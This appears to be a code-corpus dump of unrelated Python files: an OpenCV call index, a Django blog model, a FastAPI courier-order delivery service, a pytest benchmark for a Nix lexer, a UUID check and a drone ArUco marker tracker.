[((295, 322), 'cv2.imshow', 'cv.imshow', (['window_name', 'img'], {}), '(window_name, img)\n', (304, 322), True, 'import cv2 as cv\n'), ((327, 340), 'cv2.waitKey', 'cv.waitKey', (['(0)'], {}), '(0)\n', (337, 340), True, 'import cv2 as cv\n'), ((345, 367), 'cv2.destroyAllWindows', 'cv.destroyAllWindows', ([], {}), '()\n', (365, 367), True, 'import cv2 as cv\n'), ((1734, 1745), 'time.time', 'time.time', ([], {}), '()\n', (1743, 1745), False, 'import time\n'), ((2685, 2701), 'numpy.zeros', 'np.zeros', (['k_size'], {}), '(k_size)\n', (2693, 2701), True, 'import numpy as np\n'), ((2968, 2982), 'numpy.sum', 'np.sum', (['kernel'], {}), '(kernel)\n', (2974, 2982), True, 'import numpy as np\n'), ((2994, 3022), 'cv2.filter2D', 'cv.filter2D', (['img', '(-1)', 'kernel'], {}), '(img, -1, kernel)\n', (3005, 3022), True, 'import cv2 as cv\n'), ((3283, 3307), 'numpy.zeros', 'np.zeros', (['(k_size[0], 1)'], {}), '((k_size[0], 1))\n', (3291, 3307), True, 'import numpy as np\n'), ((3478, 3497), 'numpy.zeros', 'np.zeros', (['k_size[1]'], {}), '(k_size[1])\n', (3486, 3497), True, 'import numpy as np\n'), ((3657, 3678), 'numpy.sum', 'np.sum', (['kernelY[:, 0]'], {}), '(kernelY[:, 0])\n', (3663, 3678), True, 'import numpy as np\n'), ((3694, 3709), 'numpy.sum', 'np.sum', (['kernelX'], {}), '(kernelX)\n', (3700, 3709), True, 'import numpy as np\n'), ((3785, 3813), 'cv2.filter2D', 'cv.filter2D', (['img', '(-1)', 'kernel'], {}), '(img, -1, kernel)\n', (3796, 3813), True, 'import cv2 as cv\n'), ((4526, 4545), 'cv2.SVDecomp', 'cv.SVDecomp', (['kernel'], {}), '(kernel)\n', (4537, 4545), True, 'import cv2 as cv\n'), ((4601, 4613), 'numpy.argmax', 'np.argmax', (['w'], {}), '(w)\n', (4610, 4613), True, 'import numpy as np\n'), ((4774, 4808), 'cv2.sepFilter2D', 'cv.sepFilter2D', (['img_svd', '(-1)', 'vt', 'u'], {}), '(img_svd, -1, vt, u)\n', (4788, 4808), True, 'import cv2 as cv\n'), ((4862, 4886), 'numpy.seterr', 'np.seterr', ([], {'over': '"""ignore"""'}), "(over='ignore')\n", (4871, 4886), True, 'import numpy as np\n'), ((5174, 5214), 'cv2.imread', 'cv.imread', (['img_path', 'cv.IMREAD_GRAYSCALE'], {}), '(img_path, cv.IMREAD_GRAYSCALE)\n', (5183, 5214), True, 'import cv2 as cv\n'), ((5653, 5669), 'cv2.integral', 'cv.integral', (['img'], {}), '(img)\n', (5664, 5669), True, 'import cv2 as cv\n'), ((7115, 7135), 'cv2.equalizeHist', 'cv.equalizeHist', (['img'], {}), '(img)\n', (7130, 7135), True, 'import cv2 as cv\n'), ((7225, 7238), 'numpy.zeros', 'np.zeros', (['(256)'], {}), '(256)\n', (7233, 7238), True, 'import numpy as np\n'), ((8196, 8231), 'cv2.GaussianBlur', 'cv.GaussianBlur', (['img', 'k_size', 'sigma'], {}), '(img, k_size, sigma)\n', (8211, 8231), True, 'import cv2 as cv\n'), ((9349, 9395), 'cv2.GaussianBlur', 'cv.GaussianBlur', (['img_my_gaus_1', 'k_size', 'sigma1'], {}), '(img_my_gaus_1, k_size, sigma1)\n', (9364, 9395), True, 'import cv2 as cv\n'), ((9425, 9471), 'cv2.GaussianBlur', 'cv.GaussianBlur', (['img_my_gaus_1', 'k_size', 'sigma1'], {}), '(img_my_gaus_1, k_size, sigma1)\n', (9440, 9471), True, 'import cv2 as cv\n'), ((9557, 9593), 'cv2.GaussianBlur', 'cv.GaussianBlur', (['img', 'k_size', 'sigma2'], {}), '(img, k_size, sigma2)\n', (9572, 9593), True, 'import cv2 as cv\n'), ((11817, 11911), 'numpy.matrix', 'np.matrix', (['[[0.0113, 0.0838, 0.0113], [0.0838, 0.6193, 0.0838], [0.0113, 0.0838, 0.0113]]'], {}), '([[0.0113, 0.0838, 0.0113], [0.0838, 0.6193, 0.0838], [0.0113, \n 0.0838, 0.0113]])\n', (11826, 11911), True, 'import numpy as np\n'), ((11947, 12043), 'numpy.matrix', 'np.matrix', (['[[-0.8984, 0.1472, 1.141], [-1.9075, 0.1566, 2.1359], [-0.8659, 0.0573, 1.0337]\n ]'], {}), '([[-0.8984, 0.1472, 1.141], [-1.9075, 0.1566, 2.1359], [-0.8659, \n 0.0573, 1.0337]])\n', (11956, 12043), True, 'import numpy as np\n'), ((12079, 12108), 'cv2.filter2D', 'cv.filter2D', (['img', '(-1)', 'kernel1'], {}), '(img, -1, kernel1)\n', (12090, 12108), True, 'import cv2 as cv\n'), ((12251, 12280), 'cv2.filter2D', 'cv.filter2D', (['img', '(-1)', 'kernel2'], {}), '(img, -1, kernel2)\n', (12262, 12280), True, 'import cv2 as cv\n'), ((1203, 1220), 'numpy.size', 'np.size', (['img_mean'], {}), '(img_mean)\n', (1210, 1220), True, 'import numpy as np\n'), ((1599, 1616), 'numpy.size', 'np.size', (['img_mean'], {}), '(img_mean)\n', (1606, 1616), True, 'import numpy as np\n'), ((3409, 3439), 'numpy.exp', 'np.exp', (['(num / (2 * sigma ** 2))'], {}), '(num / (2 * sigma ** 2))\n', (3415, 3439), True, 'import numpy as np\n'), ((3596, 3626), 'numpy.exp', 'np.exp', (['(num / (2 * sigma ** 2))'], {}), '(num / (2 * sigma ** 2))\n', (3602, 3626), True, 'import numpy as np\n'), ((4336, 4349), 'numpy.size', 'np.size', (['img1'], {}), '(img1)\n', (4343, 4349), True, 'import numpy as np\n'), ((4409, 4422), 'numpy.size', 'np.size', (['img2'], {}), '(img2)\n', (4416, 4422), True, 'import numpy as np\n'), ((7313, 7346), 'numpy.count_nonzero', 'np.count_nonzero', (['(img_my_eqz == i)'], {}), '(img_my_eqz == i)\n', (7329, 7346), True, 'import numpy as np\n'), ((10270, 10313), 'cv2.GaussianBlur', 'cv.GaussianBlur', (['img_sp_copy', '(k_s, k_s)', '(0)'], {}), '(img_sp_copy, (k_s, k_s), 0)\n', (10285, 10313), True, 'import cv2 as cv\n'), ((10733, 10764), 'cv2.medianBlur', 'cv.medianBlur', (['img_sp_copy', 'k_s'], {}), '(img_sp_copy, k_s)\n', (10746, 10764), True, 'import cv2 as cv\n'), ((11192, 11236), 'cv2.bilateralFilter', 'cv.bilateralFilter', (['img_sp_copy', 'k_s', '(80)', '(80)'], {}), '(img_sp_copy, k_s, 80, 80)\n', (11210, 11236), True, 'import cv2 as cv\n'), ((441, 504), 'cv2.copyMakeBorder', 'cv.copyMakeBorder', (['img', '(1)', '(1)', '(1)', '(1)', 'cv.BORDER_CONSTANT'], {'value': '(0)'}), '(img, 1, 1, 1, 1, cv.BORDER_CONSTANT, value=0)\n', (458, 504), True, 'import cv2 as cv\n'), ((2908, 2938), 'numpy.exp', 'np.exp', (['(num / (2 * sigma ** 2))'], {}), '(num / (2 * sigma ** 2))\n', (2914, 2938), True, 'import numpy as np\n'), ((6345, 6394), 'random.randint', 'random.randint', (['(0)', '(img_integ2.shape[0] - square_l)'], {}), '(0, img_integ2.shape[0] - square_l)\n', (6359, 6394), False, 'import random\n'), ((6405, 6454), 'random.randint', 'random.randint', (['(0)', '(img_integ2.shape[1] - square_l)'], {}), '(0, img_integ2.shape[1] - square_l)\n', (6419, 6454), False, 'import random\n'), ((7427, 7452), 'numpy.sum', 'np.sum', (['histogram[:i + 1]'], {}), '(histogram[:i + 1])\n', (7433, 7452), True, 'import numpy as np\n'), ((2110, 2121), 'time.time', 'time.time', ([], {}), '()\n', (2119, 2121), False, 'import time\n'), ((4069, 4089), 'random.uniform', 'random.uniform', (['(0)', '(1)'], {}), '(0, 1)\n', (4083, 4089), False, 'import random\n'), ((4185, 4205), 'random.randint', 'random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (4199, 4205), False, 'import random\n')]
|
from django.db import models
class Blog(models.Model):
title = models.CharField(max_length=200)
blog = models.TextField()
date = models.DateField()
writer = models.CharField(max_length=30, null=True)
def __str__(self):
return self.title
class WriterIdentifier(models.Model):
everybodys = Blog.objects.all()
daniels = everybodys.filter(writer = 'Daniel')
stefans = everybodys.filter(writer = 'Stefan')
|
[
"django.db.models.CharField",
"django.db.models.TextField",
"django.db.models.DateField"
] |
[((68, 100), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (84, 100), False, 'from django.db import models\n'), ((112, 130), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (128, 130), False, 'from django.db import models\n'), ((142, 160), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (158, 160), False, 'from django.db import models\n'), ((174, 216), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)', 'null': '(True)'}), '(max_length=30, null=True)\n', (190, 216), False, 'from django.db import models\n')]
|
from sqlalchemy.orm import Session
from fastapi import HTTPException
import models
import schemas
import ast
import datetime
import pandas as pd
def get_courier_by_id(db: Session, courier_id: int):
courier = db.query(models.Courier).filter(models.Courier.courier_id == courier_id).first()
return courier
def get_all_couriers(db: Session):
return db.query(models.Courier).all()
def create_couriers(db: Session, courier_list: schemas.CouriersListIn, success_list: list):
for courier in courier_list.data:
courier = models.Courier(courier_id=courier.courier_id, courier_type=courier.courier_type,
regions=str(courier.regions), working_hours=str(courier.working_hours))
db.add(courier)
db.commit()
db.refresh(courier)
return {"couriers": success_list}
def update_courier(db: Session, courier_id: int, patch_info: schemas.CourierPatchIn):
previous_courier_data = get_courier_by_id(db=db, courier_id=courier_id)
courier_orders = get_assigned_orders_by_courier(db=db, courier_id=courier_id)
current_weight_on_courier = 0
if courier_orders:
for order in courier_orders:
order = get_order_by_id(db=db, order_id=order.order_id)
current_weight_on_courier += order.weight
#Если изменилась грузоподъемность
if patch_info.courier_type is not None:
weight_map = {"foot": 10.0, "bike": 15.0, "car": 50}
new_courier_capacity = weight_map[patch_info.courier_type]
#Если новая грузоподъемность меньше старой
if new_courier_capacity < weight_map[previous_courier_data.courier_type]:
#Удаляем назначенные заказы, пока суммарный вес текущих заказов больше новой грузоподъемности
for order in courier_orders:
order = get_order_by_id(db=db, order_id=order.order_id)
db.query(models.AssignedOrder).filter(models.AssignedOrder.order_id == order.order_id).delete()
current_weight_on_courier -= order.weight
if current_weight_on_courier < new_courier_capacity:
break
db.query(models.Courier).filter(models.Courier.courier_id == courier_id).update({models.Courier.courier_type: str(patch_info.courier_type)})
#Если изменились регионы
if patch_info.regions is not None:
#Удаляем назначенные заказы из регионов, не входящих в новый список
for order in courier_orders:
order = get_order_by_id(db=db, order_id=order.order_id)
if order.region not in patch_info.regions:
db.query(models.AssignedOrder).filter(models.AssignedOrder.order_id == order.order_id).delete()
db.query(models.Courier).filter(models.Courier.courier_id == courier_id).update({models.Courier.regions: str(patch_info.regions)})
#Если изменился график
if patch_info.working_hours is not None:
#Удаляем назначенные заказы с неподходящими часами приема
for order in courier_orders:
order = get_order_by_id(db=db, order_id=order.order_id)
time_suited = False
for delivery_period in ast.literal_eval(order.delivery_hours):
for work_period in patch_info.working_hours:
if datetime.time(int(delivery_period[:2]), int(delivery_period[3:5])) < datetime.time(int(work_period[-5:-3]), int(work_period[-2:])) \
or datetime.time(int(delivery_period[-5:-3]), int(delivery_period[-2:])) > datetime.time(int(work_period[:2]), int(work_period[3:5])):
time_suited = True
break
if time_suited:
break
if not time_suited:
db.query(models.AssignedOrder).filter(models.AssignedOrder.order_id == order.order_id).delete()
db.query(models.Courier).filter(models.Courier.courier_id == courier_id).update({models.Courier.working_hours: str(patch_info.working_hours)})
db.commit()
courier = get_courier_by_id(db=db, courier_id=courier_id)
courier.regions = ast.literal_eval(courier.regions)
courier.working_hours = ast.literal_eval(courier.working_hours)
return courier
def get_order_by_id(db: Session, order_id: int):
order = db.query(models.Order).filter(models.Order.order_id == order_id).first()
return order
def get_all_orders(db: Session):
return db.query(models.Order).all()
def create_orders(db: Session, order_list: schemas.OrderListIn, success_list: list):
for order in order_list.data:
order = models.Order(order_id=order.order_id, weight=order.weight, region=order.region, delivery_hours=str(order.delivery_hours))
db.add(order)
db.commit()
db.refresh(order)
return {"orders": success_list}
def assign_orders(db: Session, courier_id: int):
#Берем все добавленные, назначенные, выполненные заказы
assigned_orders = {order.order_id for order in get_all_assigned_orders(db=db)}
all_orders = {order.order_id for order in get_all_orders(db=db)}
complete_orders = {order.order_id for order in get_all_complete_orders(db=db)}
#Получаем невыполненные
unassigned_orders = all_orders - assigned_orders
unassigned_orders = [get_order_by_id(db=db, order_id=order) for order in unassigned_orders]
#Будем назначать задачи жадно: от самых тяжелых до самых легких. Исходим из предположения, что тяжелее=ценнее (хотя в общем случае это не так, и нам понадобится цена, чтобы решить задачу о рюкзаке :) )
unassigned_orders.sort(key=lambda x: x.weight, reverse=True)
courier = get_courier_by_id(db=db, courier_id=courier_id)
weight_map = {"foot": 10.0, "bike": 15.0, "car": 50.0}
courier_capacity = weight_map[courier.courier_type]
current_weight_on_courier = 0
courier_assigned_orders = get_assigned_orders_by_courier(db=db, courier_id=courier_id)
assignment_list = []
#Считаем, сколько на курьере на данный момент веса (если на нем есть заказы)
if courier_assigned_orders:
for order in courier_assigned_orders:
current_weight_on_courier += get_order_by_id(db=db, order_id=order.order_id).weight
#Проверяем каждый заказ из неназначенных
for order in unassigned_orders:
time_suited = False
#Проверяем, пересекается ли хотя бы один интервал приема заказа с хотя бы одним интервалом работы
for delivery_period in ast.literal_eval(order.delivery_hours):
for work_period in ast.literal_eval(courier.working_hours):
if datetime.time(int(delivery_period[:2]), int(delivery_period[3:5])) < datetime.time(int(work_period[-5:-3]), int(work_period[-2:])) \
or datetime.time(int(delivery_period[-5:-3]), int(delivery_period[-2:])) > datetime.time(int(work_period[:2]), int(work_period[3:5])):
time_suited = True
break
if time_suited:
break
#Если курьер вместит заказ, работает в подходящем регионе и в подходящие часы - назначаем на него заказ
if current_weight_on_courier + order.weight <= courier_capacity and order.region in ast.literal_eval(courier.regions) and time_suited and order.order_id not in complete_orders:
current_weight_on_courier += order.weight
order = models.AssignedOrder(order_id=order.order_id, courier_id=courier.courier_id, assign_time=str(datetime.datetime.now()))
db.add(order)
assignment_list.append({"id": order.order_id})
if assignment_list:
db.commit()
return {"orders": assignment_list, "assign_time": str(datetime.datetime.now())}
else:
return {"orders": []}
def complete_order(db: Session, complete_order: schemas.CompleteOrder):
assigned_order = get_assigned_order(db=db, order_id=complete_order.order_id)
order = get_order_by_id(db=db, order_id=complete_order.order_id)
courier = get_courier_by_id(db=db, courier_id=complete_order.courier_id)
if assigned_order and order and assigned_order.courier_id == complete_order.courier_id:
complete_order = models.CompleteOrder(order_id=complete_order.order_id, courier_id=complete_order.courier_id, complete_time=complete_order.complete_time,
region=order.region, courier_type=courier.courier_type, assign_time=assigned_order.assign_time)
db.add(complete_order)
db.commit()
db.refresh(complete_order)
return {"order_id": complete_order.order_id}
else:
raise HTTPException(status_code=400, detail="Bad Request")
def get_courier_stats(db: Session, courier_id: int):
complete_orders = get_complete_orders_by_courier(db=db, courier_id=courier_id)
courier = get_courier_by_id(db=db, courier_id=courier_id)
if complete_orders:
stats_table = pd.DataFrame()
for i, complete_order in enumerate(complete_orders):
order_dict = {"courier_id": complete_order.courier_id,
"order_id": complete_order.order_id,
"complete_time": complete_order.complete_time,
"region": complete_order.region,
"courier_type": complete_order.courier_type,
"assign_time": complete_order.assign_time}
stats_table = stats_table.append(pd.DataFrame(order_dict, index=pd.Index([i])))
stats_table['complete_time'] = pd.to_datetime(stats_table['complete_time'])
stats_table['assign_time'] = pd.to_datetime(stats_table['assign_time'])
stats_table['delivery_time'] = (stats_table['complete_time'] - stats_table['complete_time'].shift(1)).dt.seconds
stats_table['delivery_time'].loc[0] = (stats_table['complete_time'].loc[0] - stats_table['assign_time'].loc[0]).seconds
magic_t = stats_table.groupby('region').mean().delivery_time.min()
rating = round((60*60 - min(magic_t, 3600)) / (60*60) * 5, 2)
coefficient_map = {"foot": 2, "bike": 5, "car": 9}
stats_table.courier_type = stats_table.courier_type.map(coefficient_map)
earnings = sum(stats_table.courier_type * 500)
stats_response = {"courier_id": courier_id, "courier_type": courier.courier_type, "regions": ast.literal_eval(courier.regions),
"working_hours": ast.literal_eval(courier.working_hours), "rating": rating, "earnings": earnings}
return stats_response
else:
return courier
def get_all_assigned_orders(db: Session):
return db.query(models.AssignedOrder).all()
def get_assigned_orders_by_courier(db: Session, courier_id: int):
return db.query(models.AssignedOrder).filter(models.AssignedOrder.courier_id == courier_id).all()
def get_assigned_order(db: Session, order_id: int):
return db.query(models.AssignedOrder).filter(models.AssignedOrder.order_id == order_id).first()
def get_all_complete_orders(db: Session):
return db.query(models.CompleteOrder).all()
def get_complete_orders_by_courier(db: Session, courier_id: int):
return db.query(models.CompleteOrder).filter(models.CompleteOrder.courier_id == courier_id).all()
|
[
"pandas.DataFrame",
"fastapi.HTTPException",
"models.CompleteOrder",
"pandas.Index",
"pandas.to_datetime",
"ast.literal_eval",
"datetime.datetime.now"
] |
[((4123, 4156), 'ast.literal_eval', 'ast.literal_eval', (['courier.regions'], {}), '(courier.regions)\n', (4139, 4156), False, 'import ast\n'), ((4185, 4224), 'ast.literal_eval', 'ast.literal_eval', (['courier.working_hours'], {}), '(courier.working_hours)\n', (4201, 4224), False, 'import ast\n'), ((6463, 6501), 'ast.literal_eval', 'ast.literal_eval', (['order.delivery_hours'], {}), '(order.delivery_hours)\n', (6479, 6501), False, 'import ast\n'), ((8159, 8405), 'models.CompleteOrder', 'models.CompleteOrder', ([], {'order_id': 'complete_order.order_id', 'courier_id': 'complete_order.courier_id', 'complete_time': 'complete_order.complete_time', 'region': 'order.region', 'courier_type': 'courier.courier_type', 'assign_time': 'assigned_order.assign_time'}), '(order_id=complete_order.order_id, courier_id=\n complete_order.courier_id, complete_time=complete_order.complete_time,\n region=order.region, courier_type=courier.courier_type, assign_time=\n assigned_order.assign_time)\n', (8179, 8405), False, 'import models\n'), ((8601, 8653), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(400)', 'detail': '"""Bad Request"""'}), "(status_code=400, detail='Bad Request')\n", (8614, 8653), False, 'from fastapi import HTTPException\n'), ((8900, 8914), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (8912, 8914), True, 'import pandas as pd\n'), ((9518, 9562), 'pandas.to_datetime', 'pd.to_datetime', (["stats_table['complete_time']"], {}), "(stats_table['complete_time'])\n", (9532, 9562), True, 'import pandas as pd\n'), ((9600, 9642), 'pandas.to_datetime', 'pd.to_datetime', (["stats_table['assign_time']"], {}), "(stats_table['assign_time'])\n", (9614, 9642), True, 'import pandas as pd\n'), ((3161, 3199), 'ast.literal_eval', 'ast.literal_eval', (['order.delivery_hours'], {}), '(order.delivery_hours)\n', (3177, 3199), False, 'import ast\n'), ((6534, 6573), 'ast.literal_eval', 'ast.literal_eval', (['courier.working_hours'], {}), '(courier.working_hours)\n', (6550, 6573), False, 'import ast\n'), ((10352, 10385), 'ast.literal_eval', 'ast.literal_eval', (['courier.regions'], {}), '(courier.regions)\n', (10368, 10385), False, 'import ast\n'), ((10430, 10469), 'ast.literal_eval', 'ast.literal_eval', (['courier.working_hours'], {}), '(courier.working_hours)\n', (10446, 10469), False, 'import ast\n'), ((7197, 7230), 'ast.literal_eval', 'ast.literal_eval', (['courier.regions'], {}), '(courier.regions)\n', (7213, 7230), False, 'import ast\n'), ((7674, 7697), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7695, 7697), False, 'import datetime\n'), ((7457, 7480), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7478, 7480), False, 'import datetime\n'), ((9454, 9467), 'pandas.Index', 'pd.Index', (['[i]'], {}), '([i])\n', (9462, 9467), True, 'import pandas as pd\n')]
|
import urllib.request
import zipfile
import time
import statistics
import pytest
from sly.lex import LexError
from nix_transform import NixLexer
@pytest.mark.parametrize('repo_url', [
'https://github.com/NixOS/nixpkgs/archive/master.zip'
])
def test_benchmark_lexer(tmp_path, repo_url):
zip_filename = tmp_path / 'temp.zip'
with urllib.request.urlopen(repo_url) as response:
with open(zip_filename, 'wb') as f:
f.write(response.read())
with zipfile.ZipFile(zip_filename) as f_zip:
filenames = [_ for _ in f_zip.namelist() if _.endswith('.nix')]
print(len(filenames), 'files to lex')
successful = 0
timings = []
long_parse_times = []
for i, filename in enumerate(filenames):
with f_zip.open(filename) as f:
contents = f.read().decode('utf8')
lexer = NixLexer()
try:
start_time = time.time()
tokens = tuple(lexer.tokenize(contents))
successful += 1
except Exception as e:
print(f'({i}) {filename}')
raise e
finally:
total = time.time() - start_time
timings.append(total)
if total > 0.2:
long_parse_times.append((filename, total))
print(f'[{successful}/{len(filenames)}] succesfully lexed')
print(f' total: {sum(timings)} [s]')
print(f' min: {min(timings)} [s]')
print(f' max: {max(timings)} [s]')
print(f' mean: {statistics.mean(timings)} [s]')
print(f'median: {statistics.median(timings)} [s]')
print('\nfiles with long parse times:')
for filename, total in long_parse_times:
print(f'{filename}: {total} [s]')
|
[
"zipfile.ZipFile",
"statistics.median",
"time.time",
"nix_transform.NixLexer",
"statistics.mean",
"pytest.mark.parametrize"
] |
[((151, 248), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""repo_url"""', "['https://github.com/NixOS/nixpkgs/archive/master.zip']"], {}), "('repo_url', [\n 'https://github.com/NixOS/nixpkgs/archive/master.zip'])\n", (174, 248), False, 'import pytest\n'), ((485, 514), 'zipfile.ZipFile', 'zipfile.ZipFile', (['zip_filename'], {}), '(zip_filename)\n', (500, 514), False, 'import zipfile\n'), ((886, 896), 'nix_transform.NixLexer', 'NixLexer', ([], {}), '()\n', (894, 896), False, 'from nix_transform import NixLexer\n'), ((943, 954), 'time.time', 'time.time', ([], {}), '()\n', (952, 954), False, 'import time\n'), ((1558, 1582), 'statistics.mean', 'statistics.mean', (['timings'], {}), '(timings)\n', (1573, 1582), False, 'import statistics\n'), ((1611, 1637), 'statistics.median', 'statistics.median', (['timings'], {}), '(timings)\n', (1628, 1637), False, 'import statistics\n'), ((1191, 1202), 'time.time', 'time.time', ([], {}), '()\n', (1200, 1202), False, 'import time\n')]
|
from uuid import UUID
def is_uuid_valid(uuid):
try:
version = UUID(uuid).version
# nil UUID has version None
return False if version is None else True
except (AttributeError, ValueError, TypeError):
return False
|
[
"uuid.UUID"
] |
[((76, 86), 'uuid.UUID', 'UUID', (['uuid'], {}), '(uuid)\n', (80, 86), False, 'from uuid import UUID\n')]
|
# CSE Drone Team 2020
import numpy as np
import cv2
import cv2.aruco as aruco
import sys, time, math
class ArucoTracker():
def __init__(self, tracker_id, tracker_size, mtx, dst, camera_size=[640,480], gui=False):
#Marker information
self.tracker_id = tracker_id
self.tracker_size = tracker_size
#Aruco dictionary
self._aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)
self._parameters = aruco.DetectorParameters_create()
#Camera Configuration
self._cap = cv2.VideoCapture(0)
self._cap.set(cv2.CAP_PROP_FRAME_WIDTH, camera_size[0])
self._cap.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_size[1])
self._mtx = mtx
self._dst = dst
#Helper attributes
self.font = cv2.FONT_HERSHEY_PLAIN
self._gui = gui
self._t_read = time.time()
self._t_detect = self._t_read
self.is_detected = False
self._kill = False
def stop(self):
self._kill = True
self._cap.release()
def track(self, loop=True, gui=None):
self._kill = False
if gui is None: gui = self._gui
# initalizing marker tracking.
detected = False
x = y = z = a = 0
while not self._kill:
#Reading camera input from rpi camera
ret, frame = self._cap.read()
if np.shape(frame) ==():
print("Camera error!")
self._cap.release()
exit()
#-- Converting image frame into gray scale
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#-- Detects all the aruco markers based upon the provided parameters and aruco dictionary.
corners, ids, rejected = aruco.detectMarkers(image=gray, dictionary=self._aruco_dict,
parameters=self._parameters,
cameraMatrix=self._mtx,
distCoeff=self._dst)
idx = -1
c =0
if not ids is None:
for x in ids:
if self.tracker_id == x[0]:
idx = c
c = c + 1
if idx != -1:
detected = True
ret_data = aruco.estimatePoseSingleMarkers(corners[idx], self.tracker_size, self._mtx, self._dst)
#We would need tvec from here as the position vectors are needed to get the markers position with reference to the drone.
rvec, tvec = ret_data[0][0,0,:], ret_data[1][0,0,:]
# These are the marker position vectors that is required to navigate the drone towards the UTA logo.
x = tvec[0]
y = tvec[1]
z = tvec[2]
angle = math.atan((corners[idx][0][2][1]-corners[idx][0][0][1])/(corners[idx][0][2][0]-corners[idx][0][0][0])) * (180/math.pi)
yaw_angle = angle
if angle < 0:
yaw_angle = angle + 90
else:
yaw_angle = angle - 90
a = yaw_angle
#Draw the detected marker and put a reference frame over it
aruco.drawDetectedMarkers(frame, corners)
aruco.drawAxis(frame, self._mtx, self._dst, rvec, tvec, 10)
print ("Marker X = %.1f Y = %.1f Z = %.1f "%(tvec[0], tvec[1], tvec[2]))
font = self.font
if gui:
#-- Print the tag position in camera frame
str_position = "MARKER Position x=%4.0f y=%4.0f z=%4.0f a = %3.1f "%(tvec[0], tvec[1], tvec[2],a)
cv2.putText(frame, str_position, (0, 100), font, 1, (0, 255, 0), 2, cv2.LINE_AA)
else:
print("Nothing detected ")
# displaing iamge in the screen can be computationally heavy for pi when ardupilot is also running on parallel.
# make sure this is off when the drone isd flying.
if gui:
#--- Display the frame
cv2.imshow('frame', frame)
#--- use 'q' to quit
key = cv2.waitKey(1) & 0xFF
if key == ord('q'):
self._cap.release()
cv2.destroyAllWindows()
break
if not loop:
# returning the positions of the logo
self._kill =True
return (detected, x, y, z, a)
def small_track(self, loop=False, gui=None):
self.tracker_id = 15
self.tracker_size = 10.1
(detected, x, y, z, a) = self.track(loop=loop, gui =gui)
return (detected, x, y, z ,a)
def big_track(self, loop=False, gui=None):
self.tracker_id = 4
self.tracker_size = 35.0
(detected, x, y, z ,a) = self.track(loop=loop, gui =gui)
return (detected, x, y, z, a)
if __name__ == "__main__":
tracker_id = 15
tracker_size = 10.1 #- [cm]
# path to the camera matrix and distortion.
# Our Raspberry pi HQ camera doesn't have much distoration but these values are absolutely required to detect the marker
# as without these will be passed later to the detector fuction.
mtx = np.loadtxt('calib/cameraMatrix.txt', delimiter=',')
dst = np.loadtxt('calib/cameraDistortion.txt', delimiter=',')
# creating our aruco tracker object.
aruco_tracker = ArucoTracker(tracker_id=tracker_id, tracker_size=tracker_size, gui= True, mtx=mtx, dst=dst)
# intializing tracker for the specific id of the logo.
aruco_tracker.track()
|
[
"math.atan",
"cv2.aruco.estimatePoseSingleMarkers",
"cv2.aruco.drawDetectedMarkers",
"cv2.aruco.DetectorParameters_create",
"cv2.putText",
"cv2.cvtColor",
"cv2.waitKey",
"cv2.destroyAllWindows",
"time.time",
"cv2.aruco.Dictionary_get",
"cv2.VideoCapture",
"cv2.aruco.detectMarkers",
"numpy.shape",
"cv2.aruco.drawAxis",
"numpy.loadtxt",
"cv2.imshow"
] |
[((5528, 5579), 'numpy.loadtxt', 'np.loadtxt', (['"""calib/cameraMatrix.txt"""'], {'delimiter': '""","""'}), "('calib/cameraMatrix.txt', delimiter=',')\n", (5538, 5579), True, 'import numpy as np\n'), ((5592, 5647), 'numpy.loadtxt', 'np.loadtxt', (['"""calib/cameraDistortion.txt"""'], {'delimiter': '""","""'}), "('calib/cameraDistortion.txt', delimiter=',')\n", (5602, 5647), True, 'import numpy as np\n'), ((397, 437), 'cv2.aruco.Dictionary_get', 'aruco.Dictionary_get', (['aruco.DICT_6X6_250'], {}), '(aruco.DICT_6X6_250)\n', (417, 437), True, 'import cv2.aruco as aruco\n'), ((466, 499), 'cv2.aruco.DetectorParameters_create', 'aruco.DetectorParameters_create', ([], {}), '()\n', (497, 499), True, 'import cv2.aruco as aruco\n'), ((551, 570), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (567, 570), False, 'import cv2\n'), ((873, 884), 'time.time', 'time.time', ([], {}), '()\n', (882, 884), False, 'import sys, time, math\n'), ((1667, 1706), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2GRAY'], {}), '(frame, cv2.COLOR_BGR2GRAY)\n', (1679, 1706), False, 'import cv2\n'), ((1849, 1988), 'cv2.aruco.detectMarkers', 'aruco.detectMarkers', ([], {'image': 'gray', 'dictionary': 'self._aruco_dict', 'parameters': 'self._parameters', 'cameraMatrix': 'self._mtx', 'distCoeff': 'self._dst'}), '(image=gray, dictionary=self._aruco_dict, parameters=\n self._parameters, cameraMatrix=self._mtx, distCoeff=self._dst)\n', (1868, 1988), True, 'import cv2.aruco as aruco\n'), ((1469, 1484), 'numpy.shape', 'np.shape', (['frame'], {}), '(frame)\n', (1477, 1484), True, 'import numpy as np\n'), ((2401, 2491), 'cv2.aruco.estimatePoseSingleMarkers', 'aruco.estimatePoseSingleMarkers', (['corners[idx]', 'self.tracker_size', 'self._mtx', 'self._dst'], {}), '(corners[idx], self.tracker_size, self._mtx,\n self._dst)\n', (2432, 2491), True, 'import cv2.aruco as aruco\n'), ((3367, 3408), 'cv2.aruco.drawDetectedMarkers', 'aruco.drawDetectedMarkers', (['frame', 'corners'], {}), '(frame, corners)\n', (3392, 3408), True, 'import cv2.aruco as aruco\n'), ((3425, 3484), 'cv2.aruco.drawAxis', 'aruco.drawAxis', (['frame', 'self._mtx', 'self._dst', 'rvec', 'tvec', '(10)'], {}), '(frame, self._mtx, self._dst, rvec, tvec, 10)\n', (3439, 3484), True, 'import cv2.aruco as aruco\n'), ((4302, 4328), 'cv2.imshow', 'cv2.imshow', (['"""frame"""', 'frame'], {}), "('frame', frame)\n", (4312, 4328), False, 'import cv2\n'), ((2954, 3067), 